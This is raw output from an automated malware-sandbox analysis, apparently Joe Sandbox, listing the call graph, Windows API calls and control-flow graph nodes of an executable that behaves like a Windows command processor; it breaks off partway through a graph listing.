19537->19547 19548 7ff744f13448 166 API calls 19537->19548 19549 7ff744f10580 12 API calls 19537->19549 19550 7ff744f0cfab _wcsicmp 19537->19550 19553 7ff744f11fac 238 API calls 19537->19553 19555 7ff744f0d044 ??_V@YAXPEAX 19537->19555 19591 7ff744f10494 19537->19591 19604 7ff744f0df60 19537->19604 19660 7ff744f2778c 19537->19660 19691 7ff744f2c738 19537->19691 19538->19457 19539->19537 19540->19537 19541->19537 19544 7ff744f1855c ??_V@YAXPEAX 19542->19544 19543->19537 19544->19507 19546->19537 19547->19537 19548->19537 19551 7ff744f0d003 GetConsoleOutputCP GetCPInfo 19549->19551 19550->19537 19552 7ff744f104f4 3 API calls 19551->19552 19552->19537 19553->19537 19555->19537 19557 7ff744f096c8 19556->19557 19558 7ff744f1b6e2 RevertToSelf CloseHandle 19556->19558 19559 7ff744f096ce 19557->19559 19560 7ff744f06a48 184 API calls 19557->19560 19559->19457 19560->19557 19562 7ff744f1596c 19561->19562 19566 7ff744f15a12 19561->19566 19563 7ff744f1598d VirtualQuery 19562->19563 19562->19566 19564 7ff744f159ad 19563->19564 19563->19566 19565 7ff744f159b7 VirtualQuery 19564->19565 19564->19566 19565->19564 19565->19566 19566->19457 19568 7ff744f2e990 19567->19568 19569 7ff744f2e954 19567->19569 19570 7ff744f2e9b4 197 API calls 19568->19570 19571 7ff744f2ee88 390 API calls 19569->19571 19572 7ff744f2e995 longjmp 19570->19572 19573 7ff744f2e964 19571->19573 19573->19568 19574 7ff744f096b4 186 API calls 19573->19574 19574->19573 19576 7ff744f276a3 19575->19576 19577 7ff744f276b7 19576->19577 19578 7ff744f096b4 186 API calls 19576->19578 19579 7ff744f2e9b4 197 API calls 19577->19579 19578->19576 19580 7ff744f276bc longjmp 19579->19580 19582 7ff744f12d89 19581->19582 19583 7ff744f12da3 19581->19583 19586 7ff744f121af 19582->19586 19587 7ff744f12e0c 19582->19587 19583->19582 19585 7ff744f12dbc GetProcessHeap RtlFreeHeap 19583->19585 19585->19582 19585->19583 19586->19493 19588 7ff744f12e32 19587->19588 19589 7ff744f12e11 19587->19589 19588->19582 19589->19588 19590 7ff744f1e494 VirtualFree 19589->19590 19593 7ff744f104a4 19591->19593 19592 7ff744f126e0 19 API calls 19592->19593 19593->19592 19594 7ff744f104b9 _get_osfhandle SetFilePointer 19593->19594 19595 7ff744f1d845 19593->19595 19597 7ff744f1d839 19593->19597 19600 7ff744f03278 166 API calls 19593->19600 19594->19537 19596 7ff744f2f1d8 166 API calls 19595->19596 19599 7ff744f1d837 19596->19599 19598 7ff744f03278 166 API calls 19597->19598 19598->19599 19601 7ff744f1d819 _getch 19600->19601 19601->19593 19602 7ff744f1d832 19601->19602 19701 7ff744f2bde4 EnterCriticalSection LeaveCriticalSection 19602->19701 19605 7ff744f0dfe2 19604->19605 19606 7ff744f0df93 19604->19606 19608 7ff744f0e100 VirtualFree 19605->19608 19609 7ff744f0e00b _setjmp 19605->19609 19606->19605 19607 7ff744f0df9f GetProcessHeap RtlFreeHeap 19606->19607 19607->19605 19607->19606 19608->19605 19610 7ff744f0e04a 19609->19610 19611 7ff744f0ceaa _tell 19609->19611 19612 7ff744f0e600 473 API calls 19610->19612 19611->19526 19613 7ff744f0e073 19612->19613 19614 7ff744f0e0e0 longjmp 19613->19614 19615 7ff744f0e081 19613->19615 19623 7ff744f0e0b0 19614->19623 19616 7ff744f0d250 475 API calls 19615->19616 19618 7ff744f0e086 19616->19618 19620 7ff744f0e600 473 API calls 19618->19620 19618->19623 19621 7ff744f0e0a7 19620->19621 19622 7ff744f2d610 167 API calls 19621->19622 19621->19623 19622->19623 19623->19611 19702 7ff744f2d3fc 19623->19702 19625 7ff744f2eefd 19624->19625 19626 7ff744f2eed1 19624->19626 19764 7ff744f1885c FormatMessageW 19625->19764 19750 7ff744f07420 19626->19750 19630 7ff744f101b8 6 API calls 19631 7ff744f2eee5 19630->19631 19634 7ff744f2eef8 19631->19634 19635 7ff744f2eeeb 19631->19635 19632 7ff744f2ef41 LocalFree GetStdHandle GetConsoleMode 19640 7ff744f2efe8 GetStdHandle GetConsoleMode 19632->19640 19641 7ff744f2efcf SetConsoleMode 19632->19641 19633 7ff744f2ef04 19633->19632 19639 7ff744f2ef2f _wcsupr 19633->19639 19636 7ff744f0d208 _close 19634->19636 19637 7ff744f0d208 _close 19635->19637 19636->19625 19656 7ff744f2eef0 19637->19656 19639->19632 19642 7ff744f2f015 SetConsoleMode 19640->19642 19646 7ff744f2f03c 19640->19646 19641->19640 19642->19646 19643 7ff744f18f80 7 API calls 19644 7ff744f1c879 19643->19644 19644->19517 19644->19518 19645 7ff744f03240 166 API calls 19645->19646 19646->19645 19647 7ff744f101b8 6 API calls 19646->19647 19648 7ff744f2f07e GetStdHandle FlushConsoleInputBuffer 19646->19648 19649 7ff744f2f0a0 GetStdHandle 19646->19649 19650 7ff744f2f12d wcschr 19646->19650 19652 7ff744f2f161 19646->19652 19653 7ff744f13448 166 API calls 19646->19653 19658 7ff744f2f0d7 towupper 19646->19658 19659 7ff744f13448 166 API calls 19646->19659 19647->19646 19648->19646 19651 7ff744f28450 367 API calls 19649->19651 19650->19646 19651->19646 19654 7ff744f2f17a 19652->19654 19655 7ff744f2f166 SetConsoleMode 19652->19655 19653->19650 19654->19656 19657 7ff744f2f17f SetConsoleMode 19654->19657 19655->19654 19656->19643 19657->19656 19658->19646 19659->19646 19668 7ff744f277bc 19660->19668 19661 7ff744f27aca 19664 7ff744f134a0 166 API calls 19661->19664 19662 7ff744f279c0 19670 7ff744f134a0 166 API calls 19662->19670 19666 7ff744f27adb 19664->19666 19665 7ff744f27ab5 19669 7ff744f13448 166 API calls 19665->19669 19672 7ff744f27af0 19666->19672 19675 7ff744f13448 166 API calls 19666->19675 19667 7ff744f27984 19667->19662 19673 7ff744f27989 19667->19673 19668->19661 19668->19662 19668->19665 19668->19667 19671 7ff744f27a00 19668->19671 19668->19673 19681 7ff744f13448 166 API calls 19668->19681 19682 7ff744f2778c 166 API calls 19668->19682 19684 7ff744f279ef 19668->19684 19669->19684 19674 7ff744f279d6 19670->19674 19677 7ff744f27a0b 19671->19677 19671->19684 19689 7ff744f27a33 19671->19689 19676 7ff744f2778c 166 API calls 19672->19676 19673->19684 19769 7ff744f276e0 19673->19769 19678 7ff744f13448 166 API calls 19674->19678 19690 7ff744f279e7 19674->19690 19675->19672 19680 7ff744f27afb 19676->19680 19677->19684 19685 7ff744f134a0 166 API calls 19677->19685 19678->19690 19680->19673 19686 7ff744f13448 166 API calls 19680->19686 19681->19668 19682->19668 19683 7ff744f13448 166 API calls 19683->19684 19684->19537 19687 7ff744f27a23 19685->19687 19686->19673 19688 7ff744f2778c 166 API calls 19687->19688 19688->19690 19689->19683 19765 7ff744f27730 19690->19765 19692 7ff744f2c775 19691->19692 19696 7ff744f2c7ab 19691->19696 19693 7ff744f0cd90 166 API calls 19692->19693 19695 7ff744f2c781 19693->19695 19694 7ff744f2c8d4 19694->19537 19695->19694 19697 7ff744f0b0d8 194 API calls 19695->19697 19696->19694 19696->19695 19698 7ff744f0b6b0 170 API calls 19696->19698 19699 7ff744f0b038 _dup2 19696->19699 19700 7ff744f0d208 _close 19696->19700 19697->19694 19698->19696 19699->19696 19700->19696 19709 7ff744f2d419 19702->19709 19703 7ff744f2d555 19727 7ff744f2d31c 19703->19727 19704 7ff744f2d592 19705 7ff744f13448 166 API calls 19704->19705 19708 7ff744f2d5a5 19705->19708 19706 7ff744f2d5c4 19710 7ff744f13448 166 API calls 19706->19710 19711 7ff744f2d5ba 19708->19711 19716 7ff744f13448 166 API calls 19708->19716 19709->19703 19709->19704 19709->19706 19712 7ff744f2d541 19709->19712 19713 7ff744f13448 166 API calls 19709->19713 19715 7ff744f1cadf 19709->19715 19719 7ff744f2d3fc 166 API calls 19709->19719 19710->19715 19720 7ff744f2d36c 19711->19720 19712->19704 19712->19706 19714 7ff744f2d546 19712->19714 19718 7ff744f2d589 19712->19718 19713->19709 19714->19703 19714->19706 19716->19711 19718->19703 19718->19704 19719->19709 19721 7ff744f2d3d8 19720->19721 19722 7ff744f2d381 19720->19722 19723 7ff744f134a0 166 API calls 19722->19723 19725 7ff744f2d390 19723->19725 19724 7ff744f13448 166 API calls 19724->19725 19725->19721 19725->19724 19726 7ff744f134a0 166 API calls 19725->19726 19726->19725 19728 7ff744f13448 166 API calls 19727->19728 19729 7ff744f2d33b 19728->19729 19730 7ff744f2d36c 166 API calls 19729->19730 19731 7ff744f2d343 19730->19731 19732 7ff744f2d3fc 166 API calls 19731->19732 19739 7ff744f2d34e 19732->19739 19733 7ff744f2d555 19737 7ff744f2d31c 166 API calls 19733->19737 19734 7ff744f2d592 19735 7ff744f13448 166 API calls 19734->19735 19738 7ff744f2d5a5 19735->19738 19736 7ff744f2d5c4 19741 7ff744f13448 166 API calls 19736->19741 19745 7ff744f2d5c2 19737->19745 19742 7ff744f2d5ba 19738->19742 19746 7ff744f13448 166 API calls 19738->19746 19739->19733 19739->19734 19739->19736 19740 7ff744f2d541 19739->19740 19743 7ff744f13448 166 API calls 19739->19743 19739->19745 19749 7ff744f2d3fc 166 API calls 19739->19749 19740->19734 19740->19736 19744 7ff744f2d546 19740->19744 19748 7ff744f2d589 19740->19748 19741->19745 19747 7ff744f2d36c 166 API calls 19742->19747 19743->19739 19744->19733 19744->19736 19745->19715 19746->19742 19747->19745 19748->19733 19748->19734 19749->19739 19751 7ff744f0745f 19750->19751 19752 7ff744f07468 19750->19752 19751->19752 19753 7ff744f248c8 _wcsicmp 19751->19753 19754 7ff744f07497 _wcsicmp 19751->19754 19752->19625 19752->19630 19757 7ff744f248ed CreateFileW 19753->19757 19755 7ff744f11ea0 8 API calls 19754->19755 19756 7ff744f074bd 19755->19756 19756->19757 19758 7ff744f074c9 CreateFileW 19756->19758 19757->19758 19759 7ff744f24929 19757->19759 19760 7ff744f07501 _open_osfhandle 19758->19760 19761 7ff744f24943 GetLastError 19758->19761 19759->19760 19760->19752 19762 7ff744f07520 CloseHandle 19760->19762 19761->19752 19762->19752 19764->19633 19768 7ff744f2773c 19765->19768 19766 7ff744f2777d 19766->19684 19767 7ff744f13448 166 API calls 19767->19768 19768->19766 19768->19767 19770 7ff744f2778c 166 API calls 19769->19770 19772 7ff744f276fb 19770->19772 19771 7ff744f2771c 19771->19684 19772->19771 19773 7ff744f13448 166 API calls 19772->19773 19774 7ff744f27711 19773->19774 19775 7ff744f2778c 166 API calls 19774->19775 19775->19771 19777 7ff744f072de 19776->19777 19778 7ff744f24621 19776->19778 19780 7ff744f072eb 19777->19780 19784 7ff744f24467 19777->19784 19785 7ff744f24530 19777->19785 19779 7ff744f247e0 19778->19779 19781 7ff744f2447b longjmp 19778->19781 19786 7ff744f24639 19778->19786 19805 7ff744f2475e 19778->19805 19782 7ff744f07348 168 API calls 19779->19782 19837 7ff744f07348 19780->19837 19787 7ff744f24492 19781->19787 19836 7ff744f24524 19782->19836 19784->19780 19784->19787 19796 7ff744f24475 19784->19796 19792 7ff744f07348 168 API calls 19785->19792 19789 7ff744f2463e 19786->19789 19790 7ff744f24695 19786->19790 19791 7ff744f07348 168 API calls 19787->19791 19789->19781 19803 7ff744f24654 19789->19803 19795 7ff744f073d4 168 API calls 19790->19795 19810 7ff744f244a8 19791->19810 19798 7ff744f24549 19792->19798 19793 7ff744f07315 19852 7ff744f073d4 19793->19852 19802 7ff744f2469a 19795->19802 19796->19781 19796->19790 19797 7ff744f07348 168 API calls 19797->19779 19804 7ff744f245b2 19798->19804 19822 7ff744f07348 168 API calls 19798->19822 19826 7ff744f2455e 19798->19826 19799 7ff744f072b0 168 API calls 19806 7ff744f2480e 19799->19806 19800 7ff744f07348 168 API calls 19800->19793 19801 7ff744f07323 19801->19252 19818 7ff744f246e1 19802->19818 19827 7ff744f246c7 19802->19827 19828 7ff744f246ea 19802->19828 19811 7ff744f07348 168 API calls 19803->19811 19807 7ff744f07348 168 API calls 19804->19807 19805->19797 19806->19252 19809 7ff744f245c7 19807->19809 19808 7ff744f072b0 168 API calls 19816 7ff744f24738 19808->19816 19813 7ff744f07348 168 API calls 19809->19813 19814 7ff744f07348 168 API calls 19810->19814 19821 7ff744f244e2 19810->19821 19811->19801 19812 7ff744f07348 168 API calls 19812->19804 19820 7ff744f245db 19813->19820 19814->19821 19815 7ff744f072b0 168 API calls 19817 7ff744f244f1 19815->19817 19819 7ff744f07348 168 API calls 19816->19819 19824 7ff744f072b0 168 API calls 19817->19824 19818->19808 19819->19836 19823 7ff744f07348 168 API calls 19820->19823 19821->19815 19822->19826 19829 7ff744f245ec 19823->19829 19825 7ff744f24503 19824->19825 19825->19801 19833 7ff744f07348 168 API calls 19825->19833 19826->19804 19826->19812 19827->19818 19834 7ff744f07348 168 API calls 19827->19834 19830 7ff744f07348 168 API calls 19828->19830 19831 7ff744f07348 168 API calls 19829->19831 19830->19818 19832 7ff744f24600 19831->19832 19835 7ff744f07348 168 API calls 19832->19835 19833->19836 19834->19818 19835->19836 19836->19799 19836->19801 19843 7ff744f0735d 19837->19843 19838 7ff744f03278 166 API calls 19839 7ff744f24820 longjmp 19838->19839 19840 7ff744f24838 19839->19840 19841 7ff744f03278 166 API calls 19840->19841 19842 7ff744f24844 longjmp 19841->19842 19844 7ff744f2485a 19842->19844 19843->19838 19843->19840 19843->19843 19851 7ff744f073ab 19843->19851 19845 7ff744f07348 166 API calls 19844->19845 19846 7ff744f2487b 19845->19846 19847 7ff744f07348 166 API calls 19846->19847 19848 7ff744f248ad 19847->19848 19849 7ff744f07348 166 API calls 19848->19849 19850 7ff744f072ff 19849->19850 19850->19793 19850->19800 19853 7ff744f2485a 19852->19853 19854 7ff744f07401 19852->19854 19855 7ff744f07348 168 API calls 19853->19855 19854->19801 19856 7ff744f2487b 19855->19856 19857 7ff744f07348 168 API calls 19856->19857 19858 7ff744f248ad 19857->19858 19859 7ff744f07348 168 API calls 19858->19859 19860 7ff744f248be 19859->19860 19860->19801 16712 7ff744f18d80 16713 7ff744f18da4 16712->16713 16714 7ff744f18db6 16713->16714 16715 7ff744f18dbf Sleep 16713->16715 16716 7ff744f18ddb _amsg_exit 16714->16716 16719 7ff744f18de7 16714->16719 16715->16713 16716->16719 16717 7ff744f18e73 _IsNonwritableInCurrentImage 16726 7ff744f137d8 GetCurrentThreadId OpenThread 16717->16726 16718 7ff744f18e56 _initterm 16718->16717 16719->16717 16719->16718 16724 7ff744f18e3c 16719->16724 16759 7ff744f104f4 16726->16759 16728 7ff744f13839 HeapSetInformation RegOpenKeyExW 16729 7ff744f1e9f8 RegQueryValueExW RegCloseKey 16728->16729 16730 7ff744f1388d 16728->16730 16732 7ff744f1ea41 GetThreadLocale 16729->16732 16731 7ff744f15920 VirtualQuery VirtualQuery 16730->16731 16733 7ff744f138ab GetConsoleOutputCP GetCPInfo 16731->16733 16750 7ff744f13919 16732->16750 16733->16732 16734 7ff744f138f1 memset 16733->16734 16734->16750 16735 7ff744f14d5c 391 API calls 16735->16750 16736 7ff744f1eb27 _setjmp 16736->16750 16737 7ff744f13948 _setjmp 16737->16750 16738 7ff744f03240 166 API calls 16738->16750 16739 7ff744f28530 370 API calls 16739->16750 16740 7ff744f101b8 6 API calls 16740->16750 16741 7ff744f14c1c 166 API calls 16741->16750 16742 7ff744f1eb71 _setmode 16742->16750 16743 7ff744f0df60 481 API calls 16743->16750 16744 7ff744f186f0 182 API calls 16744->16750 16745 7ff744f10580 12 API calls 16746 7ff744f1398b GetConsoleOutputCP GetCPInfo 16745->16746 16748 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16746->16748 16747 7ff744f158e4 EnterCriticalSection LeaveCriticalSection 16747->16750 16748->16750 16749 7ff744f0be00 659 API calls 16749->16750 16750->16729 16750->16735 16750->16736 16750->16737 16750->16738 16750->16739 16750->16740 16750->16741 16750->16742 16750->16743 16750->16744 16750->16745 16750->16747 16750->16749 16751 7ff744f158e4 EnterCriticalSection LeaveCriticalSection 16750->16751 16752 7ff744f1ebbe GetConsoleOutputCP GetCPInfo 16751->16752 16753 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16752->16753 16754 7ff744f1ebe6 16753->16754 16755 7ff744f0be00 659 API calls 16754->16755 16756 7ff744f10580 12 API calls 16754->16756 16755->16754 16757 7ff744f1ebfc GetConsoleOutputCP GetCPInfo 16756->16757 16758 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16757->16758 16758->16750 16760 7ff744f10504 16759->16760 16761 7ff744f1051e GetModuleHandleW 16760->16761 16762 7ff744f1054d GetProcAddress 16760->16762 16763 7ff744f1056c SetThreadLocale 16760->16763 16761->16760 16762->16760

                              Executed Functions

                              Function 00007FF744F0AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ff744f0aa54-7ff744f0aa98 call 7ff744f0cd90 3 7ff744f1bf5a-7ff744f1bf70 call 7ff744f14c1c call 7ff744f0ff70 0->3 4 7ff744f0aa9e 0->4 5 7ff744f0aaa5-7ff744f0aaa8 4->5 7 7ff744f0acde-7ff744f0ad00 5->7 8 7ff744f0aaae-7ff744f0aac8 wcschr 5->8 13 7ff744f0ad06 7->13 8->7 10 7ff744f0aace-7ff744f0aae9 towlower 8->10 10->7 12 7ff744f0aaef-7ff744f0aaf3 10->12 15 7ff744f1beb7-7ff744f1bec4 call 7ff744f2eaf0 12->15 16 7ff744f0aaf9-7ff744f0aafd 12->16 17 7ff744f0ad0d-7ff744f0ad1f 13->17 27 7ff744f1bf43-7ff744f1bf59 call 7ff744f14c1c 15->27 28 7ff744f1bec6-7ff744f1bed8 call 7ff744f03240 15->28 19 7ff744f1bbcf 16->19 20 7ff744f0ab03-7ff744f0ab07 16->20 21 7ff744f0ad22-7ff744f0ad2a call 7ff744f113e0 17->21 29 7ff744f1bbde 19->29 23 7ff744f0ab09-7ff744f0ab0d 20->23 24 7ff744f0ab7d-7ff744f0ab81 20->24 21->5 31 7ff744f1be63 23->31 32 7ff744f0ab13-7ff744f0ab17 23->32 30 7ff744f0ab87-7ff744f0ab95 24->30 24->31 27->3 28->27 45 7ff744f1beda-7ff744f1bee9 call 7ff744f03240 28->45 40 7ff744f1bbea-7ff744f1bbec 29->40 36 7ff744f0ab98-7ff744f0aba0 30->36 43 7ff744f1be72-7ff744f1be88 call 7ff744f03278 call 7ff744f14c1c 31->43 32->24 37 7ff744f0ab19-7ff744f0ab1d 32->37 36->36 41 7ff744f0aba2-7ff744f0abb3 call 7ff744f0cd90 36->41 37->29 42 7ff744f0ab23-7ff744f0ab27 37->42 50 7ff744f1bbf8-7ff744f1bc01 40->50 41->3 56 7ff744f0abb9-7ff744f0abde call 7ff744f113e0 call 7ff744f133a8 41->56 42->40 47 7ff744f0ab2d-7ff744f0ab31 42->47 65 7ff744f1be89-7ff744f1be8c 43->65 60 7ff744f1beeb-7ff744f1bef1 45->60 61 7ff744f1bef3-7ff744f1bef9 45->61 47->13 52 7ff744f0ab37-7ff744f0ab3b 47->52 50->17 52->50 53 7ff744f0ab41-7ff744f0ab45 52->53 57 7ff744f0ab4b-7ff744f0ab4f 53->57 58 7ff744f1bc06-7ff744f1bc2a call 7ff744f113e0 53->58 89 7ff744f0abe4-7ff744f0abe7 56->89 90 7ff744f0ac75 56->90 63 7ff744f0ad2f-7ff744f0ad33 57->63 64 7ff744f0ab55-7ff744f0ab78 call 7ff744f113e0 57->64 82 7ff744f1bc5a-7ff744f1bc61 58->82 83 7ff744f1bc2c-7ff744f1bc4c _wcsnicmp 58->83 60->27 60->61 61->27 66 7ff744f1befb-7ff744f1bf0d call 7ff744f03240 61->66 74 7ff744f0ad39-7ff744f0ad3d 63->74 75 7ff744f1bc66-7ff744f1bc8a call 7ff744f113e0 63->75 64->5 70 7ff744f0acbe 65->70 71 7ff744f1be92-7ff744f1beaa call 7ff744f03278 call 7ff744f14c1c 65->71 66->27 96 7ff744f1bf0f-7ff744f1bf21 call 7ff744f03240 66->96 79 7ff744f0acc0-7ff744f0acc7 70->79 124 7ff744f1beab-7ff744f1beb6 call 7ff744f14c1c 71->124 84 7ff744f1bcde-7ff744f1bd02 call 7ff744f113e0 74->84 85 7ff744f0ad43-7ff744f0ad49 74->85 103 7ff744f1bc8c-7ff744f1bcaa _wcsnicmp 75->103 104 7ff744f1bcc4-7ff744f1bcdc 75->104 79->79 93 7ff744f0acc9-7ff744f0acda 79->93 91 7ff744f1bd31-7ff744f1bd4f _wcsnicmp 82->91 83->82 97 7ff744f1bc4e-7ff744f1bc55 83->97 119 7ff744f1bd2a 84->119 120 7ff744f1bd04-7ff744f1bd24 _wcsnicmp 84->120 87 7ff744f1bd5e-7ff744f1bd65 85->87 88 7ff744f0ad4f-7ff744f0ad68 85->88 87->88 98 7ff744f1bd6b-7ff744f1bd73 87->98 100 7ff744f0ad6a 88->100 101 7ff744f0ad6d-7ff744f0ad70 88->101 89->70 102 7ff744f0abed-7ff744f0ac0b call 7ff744f0cd90 * 2 89->102 107 7ff744f0ac77-7ff744f0ac7f 90->107 109 7ff744f1bbc2-7ff744f1bbca 91->109 110 7ff744f1bd55 91->110 93->7 96->27 127 7ff744f1bf23-7ff744f1bf35 call 7ff744f03240 96->127 99 7ff744f1bbb3-7ff744f1bbb7 97->99 111 7ff744f1be4a-7ff744f1be5e 98->111 112 7ff744f1bd79-7ff744f1bd8b iswxdigit 98->112 113 7ff744f1bbba-7ff744f1bbbd call 7ff744f113e0 99->113 100->101 101->21 102->124 140 7ff744f0ac11-7ff744f0ac14 102->140 103->104 117 7ff744f1bcac-7ff744f1bcbf 103->117 104->91 107->70 115 7ff744f0ac81-7ff744f0ac85 107->115 109->5 110->87 111->113 112->111 121 7ff744f1bd91-7ff744f1bda3 iswxdigit 112->121 113->109 126 7ff744f0ac88-7ff744f0ac8f 115->126 117->99 119->91 120->119 125 7ff744f1bbac 120->125 121->111 128 7ff744f1bda9-7ff744f1bdbb iswxdigit 121->128 124->15 125->99 126->126 130 7ff744f0ac91-7ff744f0ac94 126->130 127->27 142 7ff744f1bf37-7ff744f1bf3e call 7ff744f03240 127->142 128->111 135 7ff744f1bdc1-7ff744f1bdd7 iswdigit 128->135 130->70 133 7ff744f0ac96-7ff744f0acaa wcsrchr 130->133 133->70 141 7ff744f0acac-7ff744f0acb9 call 7ff744f11300 133->141 138 7ff744f1bdd9-7ff744f1bddd 135->138 139 7ff744f1bddf-7ff744f1bdeb towlower 135->139 145 7ff744f1bdee-7ff744f1be0f iswdigit 138->145 139->145 140->124 146 7ff744f0ac1a-7ff744f0ac33 memset 140->146 141->70 142->27 147 7ff744f1be17-7ff744f1be23 towlower 145->147 148 7ff744f1be11-7ff744f1be15 145->148 146->90 149 7ff744f0ac35-7ff744f0ac4b wcschr 146->149 150 7ff744f1be26-7ff744f1be45 call 7ff744f113e0 147->150 148->150 149->90 151 7ff744f0ac4d-7ff744f0ac54 149->151 150->111 152 7ff744f0ac5a-7ff744f0ac6f wcschr 151->152 153 7ff744f0ad72-7ff744f0ad91 wcschr 151->153 152->90 152->153 155 7ff744f0ad97-7ff744f0adac wcschr 153->155 156 7ff744f0af03-7ff744f0af07 153->156 155->156 157 7ff744f0adb2-7ff744f0adc7 wcschr 155->157 156->90 157->156 158 7ff744f0adcd-7ff744f0ade2 wcschr 157->158 158->156 159 7ff744f0ade8-7ff744f0adfd wcschr 158->159 159->156 160 7ff744f0ae03-7ff744f0ae18 wcschr 159->160 160->156 161 7ff744f0ae1e-7ff744f0ae21 160->161 162 7ff744f0ae24-7ff744f0ae27 161->162 162->156 163 7ff744f0ae2d-7ff744f0ae40 iswspace 162->163 164 7ff744f0ae4b-7ff744f0ae5e 163->164 165 7ff744f0ae42-7ff744f0ae49 163->165 166 7ff744f0ae66-7ff744f0ae6d 164->166 165->162 166->166 167 7ff744f0ae6f-7ff744f0ae77 166->167 167->43 168 7ff744f0ae7d-7ff744f0ae97 call 7ff744f113e0 167->168 171 7ff744f0ae9a-7ff744f0aea4 168->171 172 7ff744f0aebc-7ff744f0aef8 call 7ff744f10a6c call 7ff744f0ff70 * 2 171->172 173 7ff744f0aea6-7ff744f0aead 171->173 172->107 181 7ff744f0aefe 172->181 173->172 174 7ff744f0aeaf-7ff744f0aeba 173->174 174->171 174->172 181->65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                              • String ID: :$:$:$:ON$OFF
                              • API String ID: 972821348-467788257
                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction ID: e10ee5a522bbb755d48d25c807a506317924d67c08fac7982468edd730a12ed6
                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction Fuzzy Hash: 8B227121E0D642C6EB64BF239598279E6A1EF95B81FCD8135CD0E477DDDE3CA840A360
                              Function 00007FF744F151EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 182 7ff744f151ec-7ff744f15248 call 7ff744f15508 GetLocaleInfoW 185 7ff744f1524e-7ff744f15272 GetLocaleInfoW 182->185 186 7ff744f1ef32-7ff744f1ef3c 182->186 188 7ff744f15274-7ff744f1527a 185->188 189 7ff744f15295-7ff744f152b9 GetLocaleInfoW 185->189 187 7ff744f1ef3f-7ff744f1ef49 186->187 190 7ff744f1ef4b-7ff744f1ef52 187->190 191 7ff744f1ef61-7ff744f1ef6c 187->191 192 7ff744f154f7-7ff744f154f9 188->192 193 7ff744f15280-7ff744f15286 188->193 194 7ff744f152bb-7ff744f152c3 189->194 195 7ff744f152de-7ff744f15305 GetLocaleInfoW 189->195 190->191 196 7ff744f1ef54-7ff744f1ef5f 190->196 199 7ff744f1ef75-7ff744f1ef78 191->199 192->186 193->192 197 7ff744f1528c-7ff744f1528f 193->197 198 7ff744f152c9-7ff744f152d7 194->198 194->199 200 7ff744f15307-7ff744f1531b 195->200 201 7ff744f15321-7ff744f15343 GetLocaleInfoW 195->201 196->187 196->191 197->189 198->195 204 7ff744f1ef7a-7ff744f1ef7d 199->204 205 7ff744f1ef99-7ff744f1efa3 199->205 200->201 202 7ff744f15349-7ff744f1536e GetLocaleInfoW 201->202 203 7ff744f1efaf-7ff744f1efb9 201->203 206 7ff744f1eff2-7ff744f1effc 202->206 207 7ff744f15374-7ff744f15396 GetLocaleInfoW 202->207 209 7ff744f1efbc-7ff744f1efc6 203->209 204->195 208 7ff744f1ef83-7ff744f1ef8d 204->208 205->203 210 7ff744f1efff-7ff744f1f009 206->210 211 7ff744f1539c-7ff744f153be GetLocaleInfoW 207->211 212 7ff744f1f035-7ff744f1f03f 207->212 208->205 213 7ff744f1efc8-7ff744f1efcf 209->213 214 7ff744f1efde-7ff744f1efe9 209->214 215 7ff744f1f00b-7ff744f1f012 210->215 216 7ff744f1f021-7ff744f1f02c 210->216 217 7ff744f1f078-7ff744f1f082 211->217 218 7ff744f153c4-7ff744f153e6 GetLocaleInfoW 211->218 219 7ff744f1f042-7ff744f1f04c 212->219 213->214 220 7ff744f1efd1-7ff744f1efdc 213->220 214->206 215->216 221 7ff744f1f014-7ff744f1f01f 215->221 216->212 226 7ff744f1f085-7ff744f1f08f 217->226 222 7ff744f1f0bb-7ff744f1f0c5 218->222 223 7ff744f153ec-7ff744f1540e GetLocaleInfoW 218->223 224 7ff744f1f04e-7ff744f1f055 219->224 225 7ff744f1f064-7ff744f1f06f 219->225 220->209 220->214 221->210 221->216 227 7ff744f1f0c8-7ff744f1f0d2 222->227 228 7ff744f1f0fe-7ff744f1f108 223->228 229 7ff744f15414-7ff744f15436 GetLocaleInfoW 223->229 224->225 230 7ff744f1f057-7ff744f1f062 224->230 225->217 231 7ff744f1f0a7-7ff744f1f0b2 226->231 232 7ff744f1f091-7ff744f1f098 226->232 234 7ff744f1f0ea-7ff744f1f0f5 227->234 235 7ff744f1f0d4-7ff744f1f0db 227->235 238 7ff744f1f10b-7ff744f1f115 228->238 236 7ff744f1543c-7ff744f1545e GetLocaleInfoW 229->236 237 7ff744f1f141-7ff744f1f14b 229->237 230->219 230->225 231->222 232->231 233 7ff744f1f09a-7ff744f1f0a5 232->233 233->226 233->231 234->228 235->234 240 7ff744f1f0dd-7ff744f1f0e8 235->240 241 7ff744f1f184-7ff744f1f18b 236->241 242 7ff744f15464-7ff744f15486 GetLocaleInfoW 236->242 239 7ff744f1f14e-7ff744f1f158 237->239 243 7ff744f1f117-7ff744f1f11e 238->243 244 7ff744f1f12d-7ff744f1f138 238->244 245 7ff744f1f15a-7ff744f1f161 239->245 246 7ff744f1f170-7ff744f1f17b 239->246 240->227 240->234 247 